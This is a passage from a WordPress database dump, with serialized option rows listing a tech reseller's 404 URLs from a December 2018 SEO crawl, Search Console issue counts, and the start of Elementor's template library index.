2018\";s:16:\"last_crawled_raw\";s:10:\"1546025681\";s:13:\"response_code\";i:404;}i:42;a:6:{s:3:\"url\";s:36:\"/toughpad-fz-a2/tb_fz_a2_hero_front/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546211264\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546211264\";s:13:\"response_code\";i:404;}i:43;a:6:{s:3:\"url\";s:35:\"/mailbox-migration-exchange-online/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546208732\";s:12:\"last_crawled\";s:15:\"January 1, 2019\";s:16:\"last_crawled_raw\";s:10:\"1546307816\";s:13:\"response_code\";i:404;}i:44;a:6:{s:3:\"url\";s:26:\"/teamviewer-freemium-plan/\";s:14:\"first_detected\";s:17:\"December 12, 2018\";s:18:\"first_detected_raw\";s:10:\"1544621478\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546246236\";s:13:\"response_code\";i:404;}i:45;a:6:{s:3:\"url\";s:18:\"/adobe-postscript/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546209444\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546209444\";s:13:\"response_code\";i:404;}i:46;a:6:{s:3:\"url\";s:20:\"/microsoftsolutions/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546297901\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546297901\";s:13:\"response_code\";i:404;}i:47;a:6:{s:3:\"url\";s:19:\"/acrobat-reader-dc/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546209128\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546209128\";s:13:\"response_code\";i:404;}i:48;a:6:{s:3:\"url\";s:36:\"/portfolio/kaspersky/kaspersky-logo/\";s:14:\"first_detected\";s:17:\"December 23, 2018\";s:18:\"first_detected_raw\";s:10:\"1545539799\";s:12:\"last_crawled\";s:17:\"December 23, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545539799\";s:13:\"response_code\";i:404;}i:49;a:6:{s:3:\"url\";s:9:\"/2015/08/\";s:14:\"first_detected\";s:17:\"December 25, 2018\";s:18:\"first_detected_raw\";s:10:\"1545718136\";s:12:\"last_crawled\";s:17:\"December 25, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545718136\";s:13:\"response_code\";i:404;}i:50;a:6:{s:3:\"url\";s:33:\"/our-achievements/formula-1-20-1/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546211501\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546211501\";s:13:\"response_code\";i:404;}i:51;a:6:{s:3:\"url\";s:28:\"/portfolio/cisco/cisco-logo/\";s:14:\"first_detected\";s:17:\"December 13, 2018\";s:18:\"first_detected_raw\";s:10:\"1544732487\";s:12:\"last_crawled\";s:17:\"December 29, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546109605\";s:13:\"response_code\";i:404;}i:52;a:6:{s:3:\"url\";s:6:\"/shop/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546208574\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546208574\";s:13:\"response_code\";i:404;}i:53;a:6:{s:3:\"url\";s:22:\"/portfolio/hp/hp-logo/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546211899\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546211899\";s:13:\"response_code\";i:404;}i:54;a:6:{s:3:\"url\";s:37:\"/portfolio/intel-security/intel-logo/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546213954\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546213954\";s:13:\"response_code\";i:404;}i:55;a:6:{s:3:\"url\";s:28:\"/portfolio/epson/epson-logo/\";s:14:\"first_detected\";s:17:\"December 11, 2018\";s:18:\"first_detected_raw\";s:10:\"1544511895\";s:12:\"last_crawled\";s:17:\"December 11, 2018\";s:16:\"last_crawled_raw\";s:10:\"1544511895\";s:13:\"response_code\";i:404;}i:56;a:6:{s:3:\"url\";s:30:\"/teamviewer/336x280_tv12_en_a/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546218147\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546218147\";s:13:\"response_code\";i:404;}i:57;a:6:{s:3:\"url\";s:17:\"/office-365-faqs/\";s:14:\"first_detected\";s:17:\"December 12, 2018\";s:18:\"first_detected_raw\";s:10:\"1544628678\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546200741\";s:13:\"response_code\";i:404;}i:58;a:6:{s:3:\"url\";s:18:\"/mobile-computers/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546218545\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546218545\";s:13:\"response_code\";i:404;}i:59;a:6:{s:3:\"url\";s:31:\"/portfolio/docusign/docusign-9/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546216565\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546216565\";s:13:\"response_code\";i:404;}i:60;a:6:{s:3:\"url\";s:22:\"/information-security/\";s:14:\"first_detected\";s:17:\"December 28, 2018\";s:18:\"first_detected_raw\";s:10:\"1545983893\";s:12:\"last_crawled\";s:17:\"December 28, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545983893\";s:13:\"response_code\";i:404;}i:61;a:6:{s:3:\"url\";s:28:\"/hp-designjet-t1530-printer/\";s:14:\"first_detected\";s:17:\"December 28, 2018\";s:18:\"first_detected_raw\";s:10:\"1546021509\";s:12:\"last_crawled\";s:17:\"December 28, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546021509\";s:13:\"response_code\";i:404;}i:62;a:6:{s:3:\"url\";s:27:\"/hp-designjet-t730-printer/\";s:14:\"first_detected\";s:17:\"December 15, 2018\";s:18:\"first_detected_raw\";s:10:\"1544907671\";s:12:\"last_crawled\";s:17:\"December 21, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545427815\";s:13:\"response_code\";i:404;}i:63;a:6:{s:3:\"url\";s:27:\"/our-history/malaysia-flag/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546187766\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546187766\";s:13:\"response_code\";i:404;}i:64;a:6:{s:3:\"url\";s:26:\"/cyber-security-solutions/\";s:14:\"first_detected\";s:17:\"December 28, 2018\";s:18:\"first_detected_raw\";s:10:\"1545986387\";s:12:\"last_crawled\";s:17:\"December 29, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546115266\";s:13:\"response_code\";i:404;}i:65;a:6:{s:3:\"url\";s:13:\"/author/ezat/\";s:14:\"first_detected\";s:16:\"December 7, 2018\";s:18:\"first_detected_raw\";s:10:\"1544179463\";s:12:\"last_crawled\";s:16:\"December 7, 2018\";s:16:\"last_crawled_raw\";s:10:\"1544179463\";s:13:\"response_code\";i:404;}i:66;a:6:{s:3:\"url\";s:17:\"/service-title-5/\";s:14:\"first_detected\";s:17:\"December 28, 2018\";s:18:\"first_detected_raw\";s:10:\"1545986259\";s:12:\"last_crawled\";s:17:\"December 28, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545986259\";s:13:\"response_code\";i:404;}i:67;a:6:{s:3:\"url\";s:9:\"/2013/01/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546226720\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546226720\";s:13:\"response_code\";i:404;}i:68;a:6:{s:3:\"url\";s:13:\"/broadbase-2/\";s:14:\"first_detected\";s:16:\"December 5, 2018\";s:18:\"first_detected_raw\";s:10:\"1543972981\";s:12:\"last_crawled\";s:16:\"December 5, 2018\";s:16:\"last_crawled_raw\";s:10:\"1543972981\";s:13:\"response_code\";i:404;}i:69;a:6:{s:3:\"url\";s:9:\"/red-hat/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546209287\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546209287\";s:13:\"response_code\";i:404;}i:70;a:6:{s:3:\"url\";s:67:\"/hp-designjet-t930-printer-series/hp-designjet-t930-printer-series/\";s:14:\"first_detected\";s:17:\"December 13, 2018\";s:18:\"first_detected_raw\";s:10:\"1544732765\";s:12:\"last_crawled\";s:17:\"December 20, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545282270\";s:13:\"response_code\";i:404;}i:71;a:6:{s:3:\"url\";s:16:\"/toughpad-fz-b2/\";s:14:\"first_detected\";s:17:\"December 20, 2018\";s:18:\"first_detected_raw\";s:10:\"1545335346\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546195677\";s:13:\"response_code\";i:404;}i:72;a:6:{s:3:\"url\";s:22:\"/send-quote-broadbase/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546169042\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546169042\";s:13:\"response_code\";i:404;}i:73;a:6:{s:3:\"url\";s:14:\"/toughbook-33/\";s:14:\"first_detected\";s:17:\"December 12, 2018\";s:18:\"first_detected_raw\";s:10:\"1544619337\";s:12:\"last_crawled\";s:17:\"December 27, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545885240\";s:13:\"response_code\";i:404;}i:74;a:6:{s:3:\"url\";s:15:\"/logitech-brio/\";s:14:\"first_detected\";s:17:\"December 20, 2018\";s:18:\"first_detected_raw\";s:10:\"1545313264\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546225427\";s:13:\"response_code\";i:404;}i:75;a:6:{s:3:\"url\";s:34:\"/portfolio/fortinet/fortinet-logo/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546211027\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546211027\";s:13:\"response_code\";i:404;}i:76;a:6:{s:3:\"url\";s:13:\"/our-history/\";s:14:\"first_detected\";s:17:\"December 18, 2018\";s:18:\"first_detected_raw\";s:10:\"1545091326\";s:12:\"last_crawled\";s:15:\"January 1, 2019\";s:16:\"last_crawled_raw\";s:10:\"1546322334\";s:13:\"response_code\";i:404;}i:77;a:6:{s:3:\"url\";s:12:\"/?page_id=11\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546187227\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546187227\";s:13:\"response_code\";i:404;}i:78;a:6:{s:3:\"url\";s:67:\"/hp-designjet-t520-printer-series/hp-designjet-t520-printer-series/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546211818\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546211818\";s:13:\"response_code\";i:404;}i:79;a:6:{s:3:\"url\";s:16:\"/toughpad-fz-a2/\";s:14:\"first_detected\";s:17:\"December 11, 2018\";s:18:\"first_detected_raw\";s:10:\"1544505053\";s:12:\"last_crawled\";s:17:\"December 20, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545268977\";s:13:\"response_code\";i:404;}i:80;a:6:{s:3:\"url\";s:16:\"/send-quotation/\";s:14:\"first_detected\";s:17:\"December 28, 2018\";s:18:\"first_detected_raw\";s:10:\"1545989855\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546198534\";s:13:\"response_code\";i:404;}i:81;a:6:{s:3:\"url\";s:8:\"/vmware/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546209207\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546209207\";s:13:\"response_code\";i:404;}i:82;a:6:{s:3:\"url\";s:48:\"/hp-designjet-t830-multifunction-printer-series/\";s:14:\"first_detected\";s:17:\"December 11, 2018\";s:18:\"first_detected_raw\";s:10:\"1544517932\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546195440\";s:13:\"response_code\";i:404;}i:83;a:6:{s:3:\"url\";s:16:\"/toughpad-fz-g1/\";s:14:\"first_detected\";s:17:\"December 12, 2018\";s:18:\"first_detected_raw\";s:10:\"1544621673\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546202798\";s:13:\"response_code\";i:404;}i:84;a:6:{s:3:\"url\";s:14:\"/toughbook-l1/\";s:14:\"first_detected\";s:17:\"December 21, 2018\";s:18:\"first_detected_raw\";s:10:\"1545409211\";s:12:\"last_crawled\";s:17:\"December 21, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545409211\";s:13:\"response_code\";i:404;}i:85;a:6:{s:3:\"url\";s:28:\"/portfolio/adobe/logo-adobe/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546216723\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546216723\";s:13:\"response_code\";i:404;}i:86;a:6:{s:3:\"url\";s:23:\"/portfolio/trend-micro/\";s:14:\"first_detected\";s:17:\"December 22, 2018\";s:18:\"first_detected_raw\";s:10:\"1545468809\";s:12:\"last_crawled\";s:17:\"December 22, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545468809\";s:13:\"response_code\";i:404;}i:87;a:6:{s:3:\"url\";s:30:\"/portfolio/cisco/cisco-logo-2/\";s:14:\"first_detected\";s:17:\"December 15, 2018\";s:18:\"first_detected_raw\";s:10:\"1544843281\";s:12:\"last_crawled\";s:17:\"December 16, 2018\";s:16:\"last_crawled_raw\";s:10:\"1544938896\";s:13:\"response_code\";i:404;}i:88;a:6:{s:3:\"url\";s:19:\"/category/one-page/\";s:14:\"first_detected\";s:17:\"December 20, 2018\";s:18:\"first_detected_raw\";s:10:\"1545273564\";s:12:\"last_crawled\";s:17:\"December 24, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545688152\";s:13:\"response_code\";i:404;}i:89;a:6:{s:3:\"url\";s:29:\"/markup-text-alignment/blog4/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546216803\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546216803\";s:13:\"response_code\";i:404;}i:90;a:6:{s:3:\"url\";s:31:\"/logitech-c925e/c925e-webcam-2/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546216011\";s:12:\"last_crawled\";s:15:\"January 1, 2019\";s:16:\"last_crawled_raw\";s:10:\"1546306223\";s:13:\"response_code\";i:404;}i:91;a:6:{s:3:\"url\";s:16:\"/author/hafizah/\";s:14:\"first_detected\";s:16:\"December 7, 2018\";s:18:\"first_detected_raw\";s:10:\"1544180009\";s:12:\"last_crawled\";s:16:\"December 7, 2018\";s:16:\"last_crawled_raw\";s:10:\"1544180009\";s:13:\"response_code\";i:404;}i:92;a:6:{s:3:\"url\";s:16:\"/toughpad-fz-m1/\";s:14:\"first_detected\";s:17:\"December 11, 2018\";s:18:\"first_detected_raw\";s:10:\"1544572635\";s:12:\"last_crawled\";s:17:\"December 21, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545352052\";s:13:\"response_code\";i:404;}i:93;a:6:{s:3:\"url\";s:23:\"/hp-designjet-printers/\";s:14:\"first_detected\";s:17:\"December 23, 2018\";s:18:\"first_detected_raw\";s:10:\"1545557009\";s:12:\"last_crawled\";s:17:\"December 23, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545557009\";s:13:\"response_code\";i:404;}i:94;a:6:{s:3:\"url\";s:23:\"/dropbox-business-faqs/\";s:14:\"first_detected\";s:17:\"December 29, 2018\";s:18:\"first_detected_raw\";s:10:\"1546084132\";s:12:\"last_crawled\";s:17:\"December 29, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546084132\";s:13:\"response_code\";i:404;}i:95;a:6:{s:3:\"url\";s:17:\"/office-365-plan/\";s:14:\"first_detected\";s:17:\"December 11, 2018\";s:18:\"first_detected_raw\";s:10:\"1544490562\";s:12:\"last_crawled\";s:17:\"December 28, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546007515\";s:13:\"response_code\";i:404;}i:96;a:6:{s:3:\"url\";s:59:\"/microsoftsolutions/a67d3d33-e1e5-4cf7-bf3d-dbe1befc8d8c-0/\";s:14:\"first_detected\";s:17:\"December 30, 2018\";s:18:\"first_detected_raw\";s:10:\"1546211185\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546211185\";s:13:\"response_code\";i:404;}i:97;a:6:{s:3:\"url\";s:23:\"/logitech-c930e-webcam/\";s:14:\"first_detected\";s:17:\"December 21, 2018\";s:18:\"first_detected_raw\";s:10:\"1545412364\";s:12:\"last_crawled\";s:17:\"December 30, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546209761\";s:13:\"response_code\";i:404;}i:98;a:6:{s:3:\"url\";s:33:\"/markup-html-tags-and-formatting/\";s:14:\"first_detected\";s:17:\"December 14, 2018\";s:18:\"first_detected_raw\";s:10:\"1544812490\";s:12:\"last_crawled\";s:17:\"December 22, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545490252\";s:13:\"response_code\";i:404;}i:99;a:6:{s:3:\"url\";s:28:\"/office-365-enterprise-plan/\";s:14:\"first_detected\";s:17:\"December 31, 2018\";s:18:\"first_detected_raw\";s:10:\"1546280653\";s:12:\"last_crawled\";s:17:\"December 31, 2018\";s:16:\"last_crawled_raw\";s:10:\"1546280653\";s:13:\"response_code\";i:404;}i:100;a:6:{s:3:\"url\";s:14:\"/toughbook-20/\";s:14:\"first_detected\";s:17:\"December 12, 2018\";s:18:\"first_detected_raw\";s:10:\"1544591899\";s:12:\"last_crawled\";s:17:\"December 20, 2018\";s:16:\"last_crawled_raw\";s:10:\"1545337276\";s:13:\"response_code\";i:404;}}','no'),(7041,'wpseo_gsc_issues_counts','a:2:{s:3:\"web\";a:6:{s:9:\"not_found\";a:2:{s:5:\"count\";s:2:\"17\";s:10:\"last_fetch\";N;}s:12:\"not_followed\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:13:\"access_denied\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:12:\"server_error\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:8:\"soft_404\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:5:\"other\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}}s:15:\"smartphone_only\";a:9:{s:9:\"not_found\";a:2:{s:5:\"count\";i:101;s:10:\"last_fetch\";i:1546482343;}s:12:\"not_followed\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:13:\"access_denied\";a:2:{s:5:\"count\";i:1;s:10:\"last_fetch\";i:1546482428;}s:12:\"server_error\";a:2:{s:5:\"count\";s:1:\"2\";s:10:\"last_fetch\";N;}s:8:\"soft_404\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:7:\"roboted\";a:2:{s:5:\"count\";s:1:\"1\";s:10:\"last_fetch\";N;}s:16:\"faulty_redirects\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}i:0;a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}s:5:\"other\";a:2:{s:5:\"count\";s:1:\"0\";s:10:\"last_fetch\";N;}}}','yes'),(7042,'wpseo_gsc_last_fetch','1546482319','no'),(15699,'dismissed_general_notices_until','1559292520','yes'),(15644,'filemanager_email_verified_1','yes','yes'),(15645,'_transient_timeout_mk_fm_close_fm_help_c','1583567522','no'),(15646,'_transient_mk_fm_close_fm_help_c','mk_fm_close_fm_help_c','no'),(3803,'elementor_remote_info_library','a:3:{s:10:\"types_data\";a:2:{s:5:\"block\";a:1:{s:10:\"categories\";a:22:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:14:\"call to action\";i:4;s:7:\"clients\";i:5;s:7:\"contact\";i:6;s:3:\"faq\";i:7;s:8:\"features\";i:8;s:6:\"footer\";i:9;s:6:\"header\";i:10;s:4:\"hero\";i:11;s:9:\"portfolio\";i:12;s:7:\"pricing\";i:13;s:15:\"product archive\";i:14;s:8:\"services\";i:15;s:11:\"single page\";i:16;s:11:\"single post\";i:17;s:14:\"single product\";i:18;s:5:\"stats\";i:19;s:9:\"subscribe\";i:20;s:4:\"team\";i:21;s:12:\"testimonials\";}}s:5:\"popup\";a:1:{s:10:\"categories\";a:6:{i:0;s:10:\"bottom bar\";i:1;s:7:\"classic\";i:2;s:6:\"fly-in\";i:3;s:11:\"full screen\";i:4;s:9:\"hello bar\";i:5;s:8:\"slide-in\";}}}s:10:\"categories\";s:247:\"[\"404 page\",\"about\",\"archive\",\"call to action\",\"clients\",\"contact\",\"faq\",\"features\",\"footer\",\"header\",\"hero\",\"portfolio\",\"pricing\",\"product archive\",\"services\",\"single page\",\"single post\",\"single product\",\"stats\",\"subscribe\",\"team\",\"testimonials\"]\";s:9:\"templates\";a:613:{i:0;a:14:{s:2:\"id\";s:4:\"5525\";s:5:\"title\";s:8:\"About 14\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_10.png\";s:12:\"tmpl_created\";s:10:\"1520443532\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"13\";s:11:\"trend_index\";s:1:\"7\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:1;a:14:{s:2:\"id\";s:5:\"10107\";s:5:\"title\";s:34:\"Classic | Promotion | Announcement\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/balls_small.png\";s:12:\"tmpl_created\";s:10:\"1547851373\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/popups/classic-promotion-announcement/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"298\";s:11:\"trend_index\";s:3:\"293\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:2;a:14:{s:2:\"id\";s:4:\"5533\";s:5:\"title\";s:8:\"About 15\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_10.png\";s:12:\"tmpl_created\";s:10:\"1520443534\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-15/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"40\";s:11:\"trend_index\";s:2:\"19\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:3;a:14:{s:2:\"id\";s:4:\"5575\";s:5:\"title\";s:5:\"CTA 7\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_3.png\";s:12:\"tmpl_created\";s:10:\"1520443543\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/cta-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"22\";s:11:\"trend_index\";s:1:\"8\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:4;a:14:{s:2:\"id\";s:4:\"5615\";s:5:\"title\";s:10:\"Features 6\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/cta_white_5.png\";s:12:\"tmpl_created\";s:10:\"1520443551\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"37\";s:11:\"trend_index\";s:2:\"18\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:5;a:14:{s:2:\"id\";s:4:\"5624\";s:5:\"title\";s:10:\"Features 5\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_1.png\";s:12:\"tmpl_created\";s:10:\"1520443553\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"87\";s:11:\"trend_index\";s:2:\"66\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:6;a:14:{s:2:\"id\";s:4:\"5684\";s:5:\"title\";s:5:\"FAQ 8\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_white_1.png\";s:12:\"tmpl_created\";s:10:\"1520443565\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:2:\"77\";s:11:\"trend_index\";s:2:\"75\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:7;a:14:{s:2:\"id\";s:5:\"10158\";s:5:\"title\";s:17:\"Classic | Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/coco_small.png\";s:12:\"tmpl_created\";s:10:\"1547852227\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/classic-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"310\";s:11:\"trend_index\";s:3:\"215\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:8;a:14:{s:2:\"id\";s:4:\"5693\";s:5:\"title\";s:5:\"FAQ 9\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/03/faq_black_1.png\";s:12:\"tmpl_created\";s:10:\"1520443567\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/blocks/faq-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:3:\"faq\";s:4:\"tags\";s:7:\"[\"faq\"]\";s:10:\"menu_order\";s:1:\"0\";s:16:\"popularity_index\";s:3:\"206\";s:11:\"trend_index\";s:3:\"198\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:9;a:14:{s:2:\"id\";s:4:\"5703\";s:5:\"title\";s:6:\"FAQ 